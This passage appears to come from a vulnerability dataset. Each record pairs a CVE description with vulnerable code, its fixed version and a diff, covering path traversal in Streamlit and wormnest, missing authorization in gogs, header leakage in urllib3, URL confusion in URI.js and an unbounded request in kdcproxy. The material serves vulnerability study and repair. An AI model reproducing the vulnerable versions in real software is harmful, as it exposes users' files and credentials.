wsocks = []\n rsocks = []\n for server in map(urlparse.urlparse, servers):\n # Enforce valid, supported URIs\n scheme = server.scheme.lower().split(\"+\", 1)\n if scheme[0] not in (\"kerberos\", \"kpasswd\"):\n continue\n if len(scheme) > 1 and scheme[1] not in (\"tcp\", \"udp\"):\n continue\n\n # Do the DNS lookup\n try:\n port = server.port\n if port is None:\n port = scheme[0]\n addrs = socket.getaddrinfo(server.hostname, port)\n except socket.gaierror:\n continue\n\n # Sort addresses so that we get TCP first.\n #\n # Stick a None address on the end so we can get one\n # more attempt after all servers have been contacted.\n addrs = tuple(sorted(filter(self.__filter_addr, addrs)))\n for addr in addrs + (None,):\n if addr is not None:\n # Bypass unspecified socktypes\n if (len(scheme) > 1\n and addr[1] != self.SOCKTYPES[scheme[1]]):\n continue\n\n # Create the socket\n sock = socket.socket(*addr[:3])\n sock.setblocking(0)\n\n # Connect\n try:\n # In Python 2.x, non-blocking connect() throws\n # socket.error() with errno == EINPROGRESS. In\n # Python 3.x, it throws io.BlockingIOError().\n sock.connect(addr[4])\n except socket.error as e:\n if e.errno != 115: # errno != EINPROGRESS\n sock.close()\n continue\n except io.BlockingIOError:\n pass\n wsocks.append(sock)\n\n # Resend packets to UDP servers\n for sock in tuple(rsocks):\n if self.sock_type(sock) == socket.SOCK_DGRAM:\n wsocks.append(sock)\n rsocks.remove(sock)\n\n # Call select()\n timeout = time.time() + (15 if addr is None else 2)\n reply = self.__await_reply(pr, rsocks, wsocks, timeout)\n if reply is not None:\n break\n\n if reply is not None:\n break\n\n for sock in rsocks + wsocks:\n sock.close()\n\n if reply is None:\n raise HTTPException(503, \"Remote unavailable (%s).\" % pr)\n\n # Return the result to the client\n raise HTTPException(200, codec.encode(reply),\n [(\"Content-Type\", \"application/kerberos\")])\n except HTTPException as e:\n start_response(str(e), e.headers)\n return [e.message]\n\napplication = Application()"}], "fix_func": [{"id": "fix_py_315_1", "commit": "f274aa6", "file_path": "kdcproxy/__init__.py", "start_line": "173", "end_line": "281", "snippet": " def __call__(self, env, start_response):\n try:\n # Validate the method\n method = env[\"REQUEST_METHOD\"].upper()\n if method != \"POST\":\n raise HTTPException(405, \"Method not allowed (%s).\" % method)\n\n # Parse the request\n try:\n length = int(env[\"CONTENT_LENGTH\"])\n except AttributeError:\n raise HTTPException(411, \"Length required.\")\n if length < 0:\n raise HTTPException(411, \"Length required.\")\n if length > self.MAX_LENGTH:\n raise HTTPException(413, \"Request entity too large.\")\n try:\n pr = codec.decode(env[\"wsgi.input\"].read(length))\n except codec.ParsingError as e:\n raise HTTPException(400, e.message)\n\n # Find the remote proxy\n servers = self.__resolver.lookup(\n pr.realm,\n kpasswd=isinstance(pr, codec.KPASSWDProxyRequest)\n )\n if not servers:\n raise HTTPException(503, \"Can't find remote (%s).\" % pr)\n\n # Contact the remote server\n reply = None\n wsocks = []\n rsocks = []\n for server in map(urlparse.urlparse, servers):\n # Enforce valid, supported URIs\n scheme = server.scheme.lower().split(\"+\", 1)\n if scheme[0] not in (\"kerberos\", \"kpasswd\"):\n continue\n if len(scheme) > 1 and scheme[1] not in (\"tcp\", \"udp\"):\n continue\n\n # Do the DNS lookup\n try:\n port = server.port\n if port is None:\n port = scheme[0]\n addrs = socket.getaddrinfo(server.hostname, port)\n except socket.gaierror:\n continue\n\n # 
Sort addresses so that we get TCP first.\n #\n # Stick a None address on the end so we can get one\n # more attempt after all servers have been contacted.\n addrs = tuple(sorted(filter(self.__filter_addr, addrs)))\n for addr in addrs + (None,):\n if addr is not None:\n # Bypass unspecified socktypes\n if (len(scheme) > 1\n and addr[1] != self.SOCKTYPES[scheme[1]]):\n continue\n\n # Create the socket\n sock = socket.socket(*addr[:3])\n sock.setblocking(0)\n\n # Connect\n try:\n # In Python 2.x, non-blocking connect() throws\n # socket.error() with errno == EINPROGRESS. In\n # Python 3.x, it throws io.BlockingIOError().\n sock.connect(addr[4])\n except socket.error as e:\n if e.errno != 115: # errno != EINPROGRESS\n sock.close()\n continue\n except io.BlockingIOError:\n pass\n wsocks.append(sock)\n\n # Resend packets to UDP servers\n for sock in tuple(rsocks):\n if self.sock_type(sock) == socket.SOCK_DGRAM:\n wsocks.append(sock)\n rsocks.remove(sock)\n\n # Call select()\n timeout = time.time() + (15 if addr is None else 2)\n reply = self.__await_reply(pr, rsocks, wsocks, timeout)\n if reply is not None:\n break\n\n if reply is not None:\n break\n\n for sock in rsocks + wsocks:\n sock.close()\n\n if reply is None:\n raise HTTPException(503, \"Remote unavailable (%s).\" % pr)\n\n # Return the result to the client\n raise HTTPException(200, codec.encode(reply),\n [(\"Content-Type\", \"application/kerberos\")])\n except HTTPException as e:\n start_response(str(e), e.headers)\n return [e.message]\n\napplication = Application()"}, {"id": "fix_py_315_2", "commit": "f274aa6", "file_path": "kdcproxy/__init__.py", "start_line": "64", "end_line": "64", "snippet": " MAX_LENGTH = 128 * 1024"}], "vul_patch": "--- a/kdcproxy/__init__.py\n+++ b/kdcproxy/__init__.py\n@@ -9,7 +9,11 @@\n try:\n length = int(env[\"CONTENT_LENGTH\"])\n except AttributeError:\n- length = -1\n+ raise HTTPException(411, \"Length required.\")\n+ if length < 0:\n+ raise HTTPException(411, \"Length required.\")\n+ if length > self.MAX_LENGTH:\n+ raise HTTPException(413, \"Request entity too large.\")\n try:\n pr = codec.decode(env[\"wsgi.input\"].read(length))\n except codec.ParsingError as e:\n\n--- /dev/null\n+++ b/kdcproxy/__init__.py\n@@ -0,0 +1 @@\n+ MAX_LENGTH = 128 * 1024\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-31502", "cve_description": "The operatorequals/wormnest repository through 0.4.7 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/operatorequals/wormnest", "patch_url": ["https://github.com/operatorequals/wormnest/commit/2dfe96fc2570586ac487b399ac20d41b3c114861"], "programing_language": "Python", "vul_func": [{"id": "vul_py_264_1", "commit": "dd98162", "file_path": "app.py", "start_line": 113, "end_line": 141, "snippet": "def dir_listing(req_path):\n '''\n Found here:\nhttps://stackoverflow.com/questions/23718236/python-flask-browsing-through-directory-with-files\n '''\n # Joining the base and the requested path\n abs_path = 
os.path.join(CONFIG['SRV_DIR'], req_path)\n\n # Return 404 if path doesn't exist\n if not os.path.exists(abs_path):\n return abort(404)\n\n # Check if path is a file and serve\n if os.path.isfile(abs_path):\n return send_file(abs_path)\n\n # Show directory contents\n files = os.listdir(abs_path)\n full_paths = []\n for f in files:\n full_paths.append(\n (f, os.path.join(request.base_url, f))\n )\n # print (full_paths)\n add_url_link = \"%s%s/add\" % (request.url_root, CONFIG['MANAGE_URL_DIR'])\n return render_template('file.html',\n files=full_paths,\n add_url=add_url_link\n )"}], "fix_func": [{"id": "fix_py_264_1", "commit": "2dfe96f", "file_path": "app.py", "start_line": 113, "end_line": 141, "snippet": "def dir_listing(req_path):\n '''\n Found here:\nhttps://stackoverflow.com/questions/23718236/python-flask-browsing-through-directory-with-files\n '''\n # Joining the base and the requested path\n abs_path = safe_join(CONFIG['SRV_DIR'], req_path)\n\n # Return 404 if path doesn't exist\n if not os.path.exists(abs_path):\n return abort(404)\n\n # Check if path is a file and serve\n if os.path.isfile(abs_path):\n return send_file(abs_path)\n\n # Show directory contents\n files = os.listdir(abs_path)\n full_paths = []\n for f in files:\n full_paths.append(\n (f, os.path.join(request.base_url, f))\n )\n # print (full_paths)\n add_url_link = \"%s%s/add\" % (request.url_root, CONFIG['MANAGE_URL_DIR'])\n return render_template('file.html',\n files=full_paths,\n add_url=add_url_link\n )"}], "vul_patch": "--- a/app.py\n+++ b/app.py\n@@ -4,7 +4,7 @@\n https://stackoverflow.com/questions/23718236/python-flask-browsing-through-directory-with-files\n '''\n # Joining the base and the requested path\n- abs_path = os.path.join(CONFIG['SRV_DIR'], req_path)\n+ abs_path = safe_join(CONFIG['SRV_DIR'], req_path)\n \n # Return 404 if path doesn't exist\n if not os.path.exists(abs_path):\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0871", "cve_description": "Missing Authorization in GitHub repository gogs/gogs prior to 0.12.5.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/gogs/gogs", "patch_url": ["https://github.com/gogs/gogs/commit/64102be2c90e1b47dbdd379873ba76c80d4b0e78"], "programing_language": "Go", "vul_func": [{"id": "vul_go_204_1", "commit": "91f2cde", "file_path": "internal/auth/pam/pam.go", "start_line": 15, "end_line": 35, "snippet": "func PAMAuth(serviceName, userName, passwd string) error {\n\tt, err := pam.StartFunc(serviceName, userName, func(s pam.Style, msg string) (string, error) {\n\t\tswitch s {\n\t\tcase pam.PromptEchoOff:\n\t\t\treturn passwd, nil\n\t\tcase pam.PromptEchoOn, pam.ErrorMsg, pam.TextInfo:\n\t\t\treturn \"\", nil\n\t\t}\n\t\treturn \"\", errors.New(\"Unrecognized PAM message style\")\n\t})\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif err = t.Authenticate(0); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_204_1", "commit": "64102be2c90e1b47dbdd379873ba76c80d4b0e78", "file_path": "internal/auth/pam/pam.go", "start_line": 15, "end_line": 35, "snippet": "func PAMAuth(serviceName, 
userName, passwd string) error {\n\tt, err := pam.StartFunc(serviceName, userName, func(s pam.Style, msg string) (string, error) {\n\t\tswitch s {\n\t\tcase pam.PromptEchoOff:\n\t\t\treturn passwd, nil\n\t\tcase pam.PromptEchoOn, pam.ErrorMsg, pam.TextInfo:\n\t\t\treturn \"\", nil\n\t\t}\n\t\treturn \"\", errors.New(\"Unrecognized PAM message style\")\n\t})\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = t.Authenticate(0)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn t.AcctMgmt(0)\n}"}], "vul_patch": "--- a/internal/auth/pam/pam.go\n+++ b/internal/auth/pam/pam.go\n@@ -13,9 +13,9 @@\n \t\treturn err\n \t}\n \n-\tif err = t.Authenticate(0); err != nil {\n+\terr = t.Authenticate(0)\n+\tif err != nil {\n \t\treturn err\n \t}\n-\n-\treturn nil\n+\treturn t.AcctMgmt(0)\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-25091", "cve_description": "urllib3 before 1.24.2 does not remove the authorization HTTP header when following a cross-origin redirect (i.e., a redirect that differs in host, port, or scheme). This can allow for credentials in the authorization header to be exposed to unintended hosts or transmitted in cleartext. NOTE: this issue exists because of an incomplete fix for CVE-2018-20060 (which was case-sensitive).", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/urllib3/urllib3", "patch_url": ["https://github.com/urllib3/urllib3/commit/adb358f8e06865406d1f05e581a16cbea2136fbc"], "programing_language": "Python", "vul_func": [{"id": "vul_py_391_1", "commit": "adb358f8e06865406d1f05e581a16cbea2136fbc", "file_path": "src/urllib3/poolmanager.py", "start_line": 302, "end_line": 359, "snippet": "\n def urlopen(self, method, url, redirect=True, **kw):\n \"\"\"\n Same as :meth:`urllib3.connectionpool.HTTPConnectionPool.urlopen`\n with custom cross-host redirect logic and only sends the request-uri\n portion of the ``url``.\n\n The given ``url`` parameter must be absolute, such that an appropriate\n :class:`urllib3.connectionpool.ConnectionPool` can be chosen for it.\n \"\"\"\n u = parse_url(url)\n conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme)\n\n kw['assert_same_host'] = False\n kw['redirect'] = False\n\n if 'headers' not in kw:\n kw['headers'] = self.headers.copy()\n\n if self.proxy is not None and u.scheme == \"http\":\n response = conn.urlopen(method, url, **kw)\n else:\n response = conn.urlopen(method, u.request_uri, **kw)\n\n redirect_location = redirect and response.get_redirect_location()\n if not redirect_location:\n return response\n\n # Support relative URLs for redirecting.\n redirect_location = urljoin(url, redirect_location)\n\n # RFC 7231, Section 6.4.4\n if response.status == 303:\n method = 'GET'\n\n retries = kw.get('retries')\n if not isinstance(retries, Retry):\n retries = Retry.from_int(retries, redirect=redirect)\n\n # Strip headers marked as unsafe to forward to the redirected location.\n # Check remove_headers_on_redirect to avoid a potential network call within\n # conn.is_same_host() which may use socket.gethostbyname() in the future.\n if (retries.remove_headers_on_redirect\n and not conn.is_same_host(redirect_location)):\n headers = list(six.iterkeys(kw['headers']))\n for header in headers:\n if header.lower() in retries.remove_headers_on_redirect:\n kw['headers'].pop(header, None)\n\n try:\n 
retries = retries.increment(method, url, response=response, _pool=conn)\n except MaxRetryError:\n if retries.raise_on_redirect:\n raise\n return response\n\n kw['retries'] = retries\n kw['redirect'] = redirect"}, {"id": "vul_py_391_2", "commit": "a252e2549ff797fe13e688f05296fa496e0c469a", "file_path": "src/urllib3/util/retry.py", "start_line": 159, "end_line": 182, "snippet": " def __init__(self, total=10, connect=None, read=None, redirect=None, status=None,\n method_whitelist=DEFAULT_METHOD_WHITELIST, status_forcelist=None,\n backoff_factor=0, raise_on_redirect=True, raise_on_status=True,\n history=None, respect_retry_after_header=True,\n remove_headers_on_redirect=DEFAULT_REDIRECT_HEADERS_BLACKLIST):\n\n self.total = total\n self.connect = connect\n self.read = read\n self.status = status\n\n if redirect is False or total is False:\n redirect = 0\n raise_on_redirect = False\n\n self.redirect = redirect\n self.status_forcelist = status_forcelist or set()\n self.method_whitelist = method_whitelist\n self.backoff_factor = backoff_factor\n self.raise_on_redirect = raise_on_redirect\n self.raise_on_status = raise_on_status\n self.history = history or tuple()\n self.respect_retry_after_header = respect_retry_after_header\n self.remove_headers_on_redirect = remove_headers_on_redirect"}], "fix_func": [{"id": "fix_py_391_1", "commit": "a252e2549ff797fe13e688f05296fa496e0c469a", "file_path": "src/urllib3/poolmanager.py", "start_line": 303, "end_line": 362, "snippet": " \"\"\"\n Same as :meth:`urllib3.connectionpool.HTTPConnectionPool.urlopen`\n with custom cross-host redirect logic and only sends the request-uri\n portion of the ``url``.\n\n The given ``url`` parameter must be absolute, such that an appropriate\n :class:`urllib3.connectionpool.ConnectionPool` can be chosen for it.\n \"\"\"\n u = parse_url(url)\n conn = self.connection_from_host(u.host, port=u.port, scheme=u.scheme)\n\n kw['assert_same_host'] = False\n kw['redirect'] = False\n\n if 'headers' not in kw:\n kw['headers'] = self.headers.copy()\n\n if self.proxy is not None and u.scheme == \"http\":\n response = conn.urlopen(method, url, **kw)\n else:\n response = conn.urlopen(method, u.request_uri, **kw)\n\n redirect_location = redirect and response.get_redirect_location()\n if not redirect_location:\n return response\n\n # Support relative URLs for redirecting.\n redirect_location = urljoin(url, redirect_location)\n\n # RFC 7231, Section 6.4.4\n if response.status == 303:\n method = 'GET'\n\n retries = kw.get('retries')\n if not isinstance(retries, Retry):\n retries = Retry.from_int(retries, redirect=redirect)\n\n # Strip headers marked as unsafe to forward to the redirected location.\n # Check remove_headers_on_redirect to avoid a potential network call within\n # conn.is_same_host() which may use socket.gethostbyname() in the future.\n if (retries.remove_headers_on_redirect\n and not conn.is_same_host(redirect_location)):\n for header in retries.remove_headers_on_redirect:\n kw['headers'].pop(header, None)\n\n try:\n retries = retries.increment(method, url, response=response, _pool=conn)\n except MaxRetryError:\n if retries.raise_on_redirect:\n raise\n return response\n\n kw['retries'] = retries\n kw['redirect'] = redirect\n\n log.info(\"Redirecting %s -> %s\", url, redirect_location)\n return self.urlopen(method, redirect_location, **kw)\n\n\nclass ProxyManager(PoolManager):"}, {"id": "fix_py_391_2", "commit": "adb358f8e06865406d1f05e581a16cbea2136fbc", "file_path": "src/urllib3/util/retry.py", "start_line": 159, "end_line": 183, 
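A minimal standalone sketch of the header-stripping pattern that the fixed `Retry.__init__` snippet below adopts: normalize the configured header names to lowercase once, then drop matching request headers on a cross-origin redirect. The helper names here are hypothetical, not urllib3's API.

```python
# Hypothetical sketch of case-insensitive redirect-header stripping.
# The core of the fix: lowercase the blacklist once, up front, so that
# "Authorization", "authorization" and "AUTHORIZATION" are all caught.
DEFAULT_REDIRECT_HEADERS_BLACKLIST = frozenset(["Authorization"])


def normalized_blacklist(names=DEFAULT_REDIRECT_HEADERS_BLACKLIST):
    return frozenset(h.lower() for h in names)


def strip_sensitive_headers(headers, blacklist):
    """Return a copy of `headers` without blacklisted entries.

    `headers` is a plain name -> value dict; the comparison is done on the
    lowercased name so a mixed-case header cannot slip past the check.
    """
    return {k: v for k, v in headers.items() if k.lower() not in blacklist}


if __name__ == "__main__":
    bl = normalized_blacklist()
    req = {"authorization": "Bearer secret", "Accept": "application/json"}
    assert strip_sensitive_headers(req, bl) == {"Accept": "application/json"}
```

Storing the blacklist pre-lowercased (as the patch does with a frozenset) also avoids re-lowercasing the same configuration on every redirect.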
"snippet": " def __init__(self, total=10, connect=None, read=None, redirect=None, status=None,\n method_whitelist=DEFAULT_METHOD_WHITELIST, status_forcelist=None,\n backoff_factor=0, raise_on_redirect=True, raise_on_status=True,\n history=None, respect_retry_after_header=True,\n remove_headers_on_redirect=DEFAULT_REDIRECT_HEADERS_BLACKLIST):\n\n self.total = total\n self.connect = connect\n self.read = read\n self.status = status\n\n if redirect is False or total is False:\n redirect = 0\n raise_on_redirect = False\n\n self.redirect = redirect\n self.status_forcelist = status_forcelist or set()\n self.method_whitelist = method_whitelist\n self.backoff_factor = backoff_factor\n self.raise_on_redirect = raise_on_redirect\n self.raise_on_status = raise_on_status\n self.history = history or tuple()\n self.respect_retry_after_header = respect_retry_after_header\n self.remove_headers_on_redirect = frozenset([\n h.lower() for h in remove_headers_on_redirect])"}], "vul_patch": "--- a/src/urllib3/poolmanager.py\n+++ b/src/urllib3/poolmanager.py\n@@ -1,5 +1,3 @@\n-\n- def urlopen(self, method, url, redirect=True, **kw):\n \"\"\"\n Same as :meth:`urllib3.connectionpool.HTTPConnectionPool.urlopen`\n with custom cross-host redirect logic and only sends the request-uri\n@@ -42,10 +40,8 @@\n # conn.is_same_host() which may use socket.gethostbyname() in the future.\n if (retries.remove_headers_on_redirect\n and not conn.is_same_host(redirect_location)):\n- headers = list(six.iterkeys(kw['headers']))\n- for header in headers:\n- if header.lower() in retries.remove_headers_on_redirect:\n- kw['headers'].pop(header, None)\n+ for header in retries.remove_headers_on_redirect:\n+ kw['headers'].pop(header, None)\n \n try:\n retries = retries.increment(method, url, response=response, _pool=conn)\n@@ -56,3 +52,9 @@\n \n kw['retries'] = retries\n kw['redirect'] = redirect\n+\n+ log.info(\"Redirecting %s -> %s\", url, redirect_location)\n+ return self.urlopen(method, redirect_location, **kw)\n+\n+\n+class ProxyManager(PoolManager):\n\n--- a/src/urllib3/util/retry.py\n+++ b/src/urllib3/util/retry.py\n@@ -21,4 +21,5 @@\n self.raise_on_status = raise_on_status\n self.history = history or tuple()\n self.respect_retry_after_header = respect_retry_after_header\n- self.remove_headers_on_redirect = remove_headers_on_redirect\n+ self.remove_headers_on_redirect = frozenset([\n+ h.lower() for h in remove_headers_on_redirect])\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-35918", "cve_description": "Streamlit is a data oriented application development framework for python. Users hosting Streamlit app(s) that use custom components are vulnerable to a directory traversal attack that could leak data from their web server file-system such as: server logs, world readable files, and potentially other sensitive information. An attacker can craft a malicious URL with file paths and the streamlit server would process that URL and return the contents of that file. This issue has been resolved in version 1.11.1. Users are advised to upgrade. 
There are no known workarounds for this issue.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/streamlit/streamlit", "patch_url": ["https://github.com/streamlit/streamlit/commit/80d9979d5f4a00217743d607078a1d867fad8acf"], "programing_language": "Python", "vul_func": [{"id": "vul_py_380_1", "commit": "4a04eefe248b9af28ba5b563e54d665f68e49116", "file_path": "lib/streamlit/components/v1/components.py", "start_line": 310, "end_line": 336, "snippet": " def get(self, path: str) -> None:\n parts = path.split(\"/\")\n component_name = parts[0]\n component_root = self._registry.get_component_path(component_name)\n if component_root is None:\n self.write(\"not found\")\n self.set_status(404)\n return\n\n filename = \"/\".join(parts[1:])\n abspath = os.path.join(component_root, filename)\n\n LOGGER.debug(\"ComponentRequestHandler: GET: %s -> %s\", path, abspath)\n\n try:\n with open(abspath, \"rb\") as file:\n contents = file.read()\n except (OSError) as e:\n LOGGER.error(f\"ComponentRequestHandler: GET {path} read error\", exc_info=e)\n self.write(\"read error\")\n self.set_status(404)\n return\n\n self.write(contents)\n self.set_header(\"Content-Type\", self.get_content_type(abspath))\n\n self.set_extra_headers(path)"}], "fix_func": [{"id": "fix_py_380_1", "commit": "80d9979d5f4a00217743d607078a1d867fad8acf", "file_path": "lib/streamlit/components/v1/components.py", "start_line": 310, "end_line": 344, "snippet": " def get(self, path: str) -> None:\n parts = path.split(\"/\")\n component_name = parts[0]\n component_root = self._registry.get_component_path(component_name)\n if component_root is None:\n self.write(\"not found\")\n self.set_status(404)\n return\n\n # follow symlinks to get an accurate normalized path\n component_root = os.path.realpath(component_root)\n filename = \"/\".join(parts[1:])\n abspath = os.path.realpath(os.path.join(component_root, filename))\n\n # Do NOT expose anything outside of the component root.\n if os.path.commonprefix([component_root, abspath]) != component_root:\n self.write(\"forbidden\")\n self.set_status(403)\n return\n\n LOGGER.debug(\"ComponentRequestHandler: GET: %s -> %s\", path, abspath)\n\n try:\n with open(abspath, \"rb\") as file:\n contents = file.read()\n except (OSError) as e:\n LOGGER.error(f\"ComponentRequestHandler: GET {path} read error\", exc_info=e)\n self.write(\"read error\")\n self.set_status(404)\n return\n\n self.write(contents)\n self.set_header(\"Content-Type\", self.get_content_type(abspath))\n\n self.set_extra_headers(path)"}], "vul_patch": "--- a/lib/streamlit/components/v1/components.py\n+++ b/lib/streamlit/components/v1/components.py\n@@ -7,8 +7,16 @@\n self.set_status(404)\n return\n \n+ # follow symlinks to get an accurate normalized path\n+ component_root = os.path.realpath(component_root)\n filename = \"/\".join(parts[1:])\n- abspath = os.path.join(component_root, filename)\n+ abspath = 
os.path.realpath(os.path.join(component_root, filename))\n+\n+ # Do NOT expose anything outside of the component root.\n+ if os.path.commonprefix([component_root, abspath]) != component_root:\n+ self.write(\"forbidden\")\n+ self.set_status(403)\n+ return\n \n LOGGER.debug(\"ComponentRequestHandler: GET: %s -> %s\", path, abspath)\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1233", "cve_description": "URL Confusion When Scheme Not Supplied in GitHub repository medialize/uri.js prior to 1.19.11.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/medialize/uri.js", "patch_url": ["https://github.com/medialize/uri.js/commit/88805fd3da03bd7a5e60947adb49d182011f1277"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_107_1", "commit": "926b2aa", "file_path": "src/URI.js", "start_line": 491, "end_line": 553, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: URI.preventInvalidHostname\n };\n }\n\n string = string.replace(URI.leading_whitespace_expression, '')\n\n // [protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:+[/\\\\]*/i, '$1://');\n\n // extract protocol\n if (string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "fix_func": [{"id": "fix_js_107_1", "commit": "88805fd", "file_path": "src/URI.js", "start_line": 491, "end_line": 555, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: URI.preventInvalidHostname\n };\n }\n\n string = string.replace(URI.leading_whitespace_expression, '')\n\n // [protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos 
+ 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:+[/\\\\]*/i, '$1://');\n // slashes and backslashes have lost all meaning for scheme relative URLs\n string = string.replace(/^[/\\\\]{2,}/i, '//');\n\n // extract protocol\n if (string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "vul_patch": "--- a/src/URI.js\n+++ b/src/URI.js\n@@ -28,6 +28,8 @@\n \n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:+[/\\\\]*/i, '$1://');\n+ // slashes and backslashes have lost all meaning for scheme relative URLs\n+ string = string.replace(/^[/\\\\]{2,}/i, '//');\n \n // extract protocol\n if (string.substring(0, 2) === '//') {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-3102", "cve_description": "A JSON Injection vulnerability exists in the `mintplex-labs/anything-llm` application, specifically within the username parameter during the login process at the `/api/request-token` endpoint. The vulnerability arises from improper handling of values, allowing attackers to perform brute force attacks without prior knowledge of the username. 
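The project patched here is JavaScript (the fix wraps the credentials in `String(...)` before they reach the ORM and bcrypt); as a hedged Python analogue of the same guard, this sketch rejects any JSON value that is not a plain string, so an object such as `{"not": ""}` can never act as a query operator:

```python
def require_str(value, field):
    # A dict or list passed through to an ORM filter is what enables the
    # operator injection described above; refuse anything but str.
    if not isinstance(value, str):
        raise TypeError(f"{field} must be a string, got {type(value).__name__}")
    return value


def parse_login(body: dict) -> tuple:
    return (require_str(body.get("username"), "username"),
            require_str(body.get("password"), "password"))


if __name__ == "__main__":
    print(parse_login({"username": "admin", "password": "hunter2"}))
    try:
        parse_login({"username": {"not": ""}, "password": "x"})
    except TypeError as exc:
        print("rejected:", exc)
```

Rejecting (rather than coercing, as the actual patch does) is a design choice: coercion keeps well-formed clients working, while rejection makes probing attempts visible in logs.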
Once the password is known, attackers can conduct blind attacks to ascertain the full username, significantly compromising system security.", "cwe_info": {"CWE-307": {"name": "Improper Restriction of Excessive Authentication Attempts", "description": "The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame."}}, "repo": "https://github.com/mintplex-labs/anything-llm", "patch_url": ["https://github.com/mintplex-labs/anything-llm/commit/2374939ffb551ab2929d7f9d5827fe6597fa8caa"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_93_1", "commit": "52fac84", "file_path": "server/endpoints/system.js", "start_line": "102", "end_line": "224", "snippet": " app.post(\"/request-token\", async (request, response) => {\n try {\n const bcrypt = require(\"bcrypt\");\n\n if (await SystemSettings.isMultiUserMode()) {\n const { username, password } = reqBody(request);\n const existingUser = await User.get({ username });\n\n if (!existingUser) {\n await EventLogs.logEvent(\n \"failed_login_invalid_username\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[001] Invalid login credentials.\",\n });\n return;\n 